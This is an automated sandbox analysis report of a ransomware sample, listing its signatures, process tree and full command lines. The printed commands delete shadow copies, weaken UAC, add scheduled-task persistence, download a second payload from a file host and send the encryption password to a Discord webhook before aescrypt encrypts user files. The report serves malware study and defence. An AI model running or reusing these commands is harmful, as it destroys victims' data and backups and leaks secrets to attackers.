a84f1837031f236302dc335ea0d285e4c9e223631ae2702a0d6176a743018161

Analysis

max time kernel
115s
max time network
120s
platform
windows7_x64
resource
win7v20201028
submitted
27-02-2021 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BleachGap.bin.exe
Size

1001KB
MD5

015bb16ddcbf8a6326ec859020466c05
SHA1

f0ff1059e64175c8bf3f557cf1b0f49ed105d7d4
SHA256

c1eb88cc7f7b43de1ef71fae416c729483d71fa930314c36dfb03b01b8455d31
SHA512

588051f1702c69b96168c9bfa41bdb9aaffdf48bf3178e30ee1bf1510989a1b43b1032b9b002f81907428182a050befc9b00143b4991c47131bcb4b25dfc83c5

Score

10^/10

evasion ransomware trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

9 1612 powershell.exe
11 232 powershell.exe
27 1836 powershell.exe
Disables Task Manager via registry modification
evasion

flow	pid	process
9	1612	powershell.exe
11	232	powershell.exe
27	1836	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

DiscordSendWebhook.exeextd.exeDiscordSendWebhook.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exe

pid	process
2032	DiscordSendWebhook.exe
1676	extd.exe
1200	DiscordSendWebhook.exe
884	aescrypt.exe
1532	aescrypt.exe
440	aescrypt.exe
2004	aescrypt.exe
1696	aescrypt.exe
1952	aescrypt.exe
632	aescrypt.exe
1820	aescrypt.exe
2028	aescrypt.exe
216	aescrypt.exe
220	aescrypt.exe
1192	aescrypt.exe
1076	aescrypt.exe
1940	aescrypt.exe
1080	aescrypt.exe
1368	aescrypt.exe
760	aescrypt.exe
228	aescrypt.exe
1128	aescrypt.exe
912	aescrypt.exe
344	aescrypt.exe
1476	aescrypt.exe
324	aescrypt.exe
1540	aescrypt.exe
1176	aescrypt.exe
2040	aescrypt.exe
952	aescrypt.exe
884	aescrypt.exe
1076	aescrypt.exe
1928	aescrypt.exe
1176	aescrypt.exe
892	aescrypt.exe
988	aescrypt.exe
584	aescrypt.exe
1552	aescrypt.exe
664	aescrypt.exe
296	aescrypt.exe
1068	aescrypt.exe
324	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
2040	aescrypt.exe
1572	aescrypt.exe
960	aescrypt.exe
1952	aescrypt.exe
1696	aescrypt.exe
1576	aescrypt.exe
1276	aescrypt.exe
1192	aescrypt.exe
1184	aescrypt.exe
1352	aescrypt.exe
1616	aescrypt.exe
232	aescrypt.exe
228	aescrypt.exe
816	aescrypt.exe
584	aescrypt.exe
664	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
216	aescrypt.exe
1572	aescrypt.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

aescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\DisconnectMeasure.tiff.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\FormatSend.crw.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\OpenEnter.tif.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\ExportGroup.png.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\RenameConnect.tif.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\WatchRename.png.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\EnterRequest.raw.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\FindAdd.png.lck	aescrypt.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\extd.exe	upx

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1552 schtasks.exe
788 schtasks.exe
1540 schtasks.exe
2028 schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

952 vssadmin.exe
2012 vssadmin.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1464 taskkill.exe
1080 taskkill.exe
1176 taskkill.exe
520 taskkill.exe
1112 taskkill.exe
1972 taskkill.exe
1176 taskkill.exe
1576 taskkill.exe
Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXE

pid process

1616 NOTEPAD.EXE
2004 NOTEPAD.EXE

pid	process
1552	schtasks.exe
788	schtasks.exe
1540	schtasks.exe
2028	schtasks.exe

pid	process
952	vssadmin.exe
2012	vssadmin.exe

pid	process
1464	taskkill.exe
1080	taskkill.exe
1176	taskkill.exe
520	taskkill.exe
1112	taskkill.exe
1972	taskkill.exe
1176	taskkill.exe
1576	taskkill.exe

pid	process
1616	NOTEPAD.EXE
2004	NOTEPAD.EXE

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs

Processes:

pid	process
2032	DiscordSendWebhook.exe
1676	extd.exe
1200	DiscordSendWebhook.exe
884	aescrypt.exe
1532	aescrypt.exe
440	aescrypt.exe
2004	aescrypt.exe
1696	aescrypt.exe
1952	aescrypt.exe
632	aescrypt.exe
1820	aescrypt.exe
2028	aescrypt.exe
216	aescrypt.exe
220	aescrypt.exe
1192	aescrypt.exe
1076	aescrypt.exe
1940	aescrypt.exe
1080	aescrypt.exe
1368	aescrypt.exe
760	aescrypt.exe
228	aescrypt.exe
1128	aescrypt.exe
912	aescrypt.exe
344	aescrypt.exe
1476	aescrypt.exe
324	aescrypt.exe
1540	aescrypt.exe
1176	aescrypt.exe
2040	aescrypt.exe
952	aescrypt.exe
884	aescrypt.exe
1076	aescrypt.exe
1928	aescrypt.exe
1176	aescrypt.exe
892	aescrypt.exe
988	aescrypt.exe
584	aescrypt.exe
1552	aescrypt.exe
664	aescrypt.exe
296	aescrypt.exe
1068	aescrypt.exe
324	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
2040	aescrypt.exe
1572	aescrypt.exe
960	aescrypt.exe
1952	aescrypt.exe
1696	aescrypt.exe
1576	aescrypt.exe
1276	aescrypt.exe
1192	aescrypt.exe
1184	aescrypt.exe
1352	aescrypt.exe
1616	aescrypt.exe
232	aescrypt.exe
228	aescrypt.exe
816	aescrypt.exe
584	aescrypt.exe
664	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
216	aescrypt.exe
1572	aescrypt.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaescrypt.execertutil.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1564	powershell.exe
1564	powershell.exe
1612	powershell.exe
1612	powershell.exe
232	powershell.exe
232	powershell.exe
1304	powershell.exe
1304	powershell.exe
988	powershell.exe
988	powershell.exe
1576	powershell.exe
1576	powershell.exe
1192	powershell.exe
1192	powershell.exe
1656	powershell.exe
1656	powershell.exe
1640	powershell.exe
1640	powershell.exe
1076	powershell.exe
1076	powershell.exe
912	powershell.exe
912	powershell.exe
1368	powershell.exe
1368	powershell.exe
1780	aescrypt.exe
1780	aescrypt.exe
584	certutil.exe
584	certutil.exe
1720	powershell.exe
1836	powershell.exe
1720	powershell.exe
1836	powershell.exe
968	powershell.exe
968	powershell.exe
1392	powershell.exe
1392	powershell.exe
752	powershell.exe
752	powershell.exe
1832	powershell.exe
1832	powershell.exe
296	powershell.exe
296	powershell.exe
1068	powershell.exe
1068	powershell.exe
664	powershell.exe
664	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exevssvc.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2044	WMIC.exe
Token: SeSecurityPrivilege	2044	WMIC.exe
Token: SeTakeOwnershipPrivilege	2044	WMIC.exe
Token: SeLoadDriverPrivilege	2044	WMIC.exe
Token: SeSystemProfilePrivilege	2044	WMIC.exe
Token: SeSystemtimePrivilege	2044	WMIC.exe
Token: SeProfSingleProcessPrivilege	2044	WMIC.exe
Token: SeIncBasePriorityPrivilege	2044	WMIC.exe
Token: SeCreatePagefilePrivilege	2044	WMIC.exe
Token: SeBackupPrivilege	2044	WMIC.exe
Token: SeRestorePrivilege	2044	WMIC.exe
Token: SeShutdownPrivilege	2044	WMIC.exe
Token: SeDebugPrivilege	2044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2044	WMIC.exe
Token: SeRemoteShutdownPrivilege	2044	WMIC.exe
Token: SeUndockPrivilege	2044	WMIC.exe
Token: SeManageVolumePrivilege	2044	WMIC.exe
Token: 33	2044	WMIC.exe
Token: 34	2044	WMIC.exe
Token: 35	2044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2044	WMIC.exe
Token: SeSecurityPrivilege	2044	WMIC.exe
Token: SeTakeOwnershipPrivilege	2044	WMIC.exe
Token: SeLoadDriverPrivilege	2044	WMIC.exe
Token: SeSystemProfilePrivilege	2044	WMIC.exe
Token: SeSystemtimePrivilege	2044	WMIC.exe
Token: SeProfSingleProcessPrivilege	2044	WMIC.exe
Token: SeIncBasePriorityPrivilege	2044	WMIC.exe
Token: SeCreatePagefilePrivilege	2044	WMIC.exe
Token: SeBackupPrivilege	2044	WMIC.exe
Token: SeRestorePrivilege	2044	WMIC.exe
Token: SeShutdownPrivilege	2044	WMIC.exe
Token: SeDebugPrivilege	2044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2044	WMIC.exe
Token: SeRemoteShutdownPrivilege	2044	WMIC.exe
Token: SeUndockPrivilege	2044	WMIC.exe
Token: SeManageVolumePrivilege	2044	WMIC.exe
Token: 33	2044	WMIC.exe
Token: 34	2044	WMIC.exe
Token: 35	2044	WMIC.exe
Token: SeBackupPrivilege	1620	vssvc.exe
Token: SeRestorePrivilege	1620	vssvc.exe
Token: SeAuditPrivilege	1620	vssvc.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeIncreaseQuotaPrivilege	1184	WMIC.exe
Token: SeSecurityPrivilege	1184	WMIC.exe
Token: SeTakeOwnershipPrivilege	1184	WMIC.exe
Token: SeLoadDriverPrivilege	1184	WMIC.exe
Token: SeSystemProfilePrivilege	1184	WMIC.exe
Token: SeSystemtimePrivilege	1184	WMIC.exe
Token: SeProfSingleProcessPrivilege	1184	WMIC.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exeDiscordSendWebhook.exe

pid	process
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe

Suspicious use of SendNotifyMessage 10 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exeDiscordSendWebhook.exe

pid	process
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BleachGap.bin.execmd.exe

description	pid	process	target process
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	cmd.exe
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	cmd.exe
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	cmd.exe
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	cmd.exe
PID 2020 wrote to memory of 2044	2020	cmd.exe	WMIC.exe
PID 2020 wrote to memory of 2044	2020	cmd.exe	WMIC.exe
PID 2020 wrote to memory of 2044	2020	cmd.exe	WMIC.exe
PID 2020 wrote to memory of 952	2020	cmd.exe	vssadmin.exe
PID 2020 wrote to memory of 952	2020	cmd.exe	vssadmin.exe
PID 2020 wrote to memory of 952	2020	cmd.exe	vssadmin.exe
PID 2020 wrote to memory of 1068	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1068	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1068	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 932	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 932	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 932	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1484	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1484	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1484	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 584	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 584	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 584	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1540	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1540	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1540	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1552	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1552	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1552	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 664	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 664	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 664	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 296	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 296	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 296	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 912	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 912	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 912	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	DiscordSendWebhook.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	DiscordSendWebhook.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	DiscordSendWebhook.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	DiscordSendWebhook.exe
PID 2020 wrote to memory of 1564	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 1564	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 1564	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 1464	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1464	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1464	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1080	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1080	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1080	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1176	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1176	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1176	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 520	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 520	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 520	2020	cmd.exe	taskkill.exe
PID 2020 wrote to memory of 1552	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1552	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1552	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1612	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 1612	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 1612	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 232	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 232	2020	cmd.exe	powershell.exe

Views/modifies file attributes 1 TTPs 7 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2028 attrib.exe
664 attrib.exe
296 attrib.exe
912 attrib.exe
528 attrib.exe
1836 attrib.exe
1928 attrib.exe

pid	process
2028	attrib.exe
664	attrib.exe
296	attrib.exe
912	attrib.exe
528	attrib.exe
1836	attrib.exe
1928	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
"C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\21F4.bat C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:952

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
3⤵
PID:1068

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
3⤵
PID:932

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
3⤵
PID:1484

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
3⤵
PID:584

C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
3⤵
PID:1540

C:\Windows\system32\reg.exe
REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
3⤵
PID:1552

C:\Windows\system32\attrib.exe
attrib +r +s +h +a +i C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
3⤵
- Views/modifies file attributes
PID:664

C:\Windows\system32\attrib.exe
attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe"
3⤵
- Views/modifies file attributes
PID:296

C:\Windows\system32\attrib.exe
attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook.exe"
3⤵
- Views/modifies file attributes
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook" -m ":writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start -verb runas cmd.exe /ArgumentList "/c kill.bat" /filepath "C:\Users\Admin\AppData\Local\Temp" /WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\system32\taskkill.exe
taskkill /f /im opera.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\system32\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\system32\taskkill.exe
taskkill /f /im firefox.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\system32\taskkill.exe
taskkill /f /im iexplore.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe" /RU "SYSTEM" /f
3⤵
- Creates scheduled task(s)
PID:1552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe -OutFile C:\Users\Admin\AppData\Local\Temp\final.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe C:\Users\Admin\AppData\Local\Temp\final.exe
3⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\extd.exe "/download" "https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe" "C:\Users\Admin\AppData\Local\Temp\final.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1676

C:\Windows\system32\schtasks.exe
schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
3⤵
- Creates scheduled task(s)
PID:788

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook" -m ":satellite: New Crypt from Admin, Password: aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj, FakeAccount: zHEuUzVPUyDp4d4f3pMK433N9kxuw0tAoB7, PersonalKey:||LeL5o5LxijTSrVwoFrRm0QXa25DC1nhhBcDX||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1200

C:\Windows\system32\attrib.exe
attrib +r +a +s +h +i C:\Users\Admin\AppData\Local\Temp /s /D
3⤵
- Views/modifies file attributes
PID:528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:304

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:884

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ImportBlock.doc.lck" "ImportBlock.doc"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1532

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeTrace.mpeg.lck" "InvokeTrace.mpeg"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnpublishUnlock.asp.lck" "UnpublishUnlock.asp"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2004

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NewCopy.wdp.lck" "NewCopy.wdp"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1696

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CheckpointBackup.svgz.lck" "CheckpointBackup.svgz"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CheckpointDismount.odt.lck" "CheckpointDismount.odt"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:632

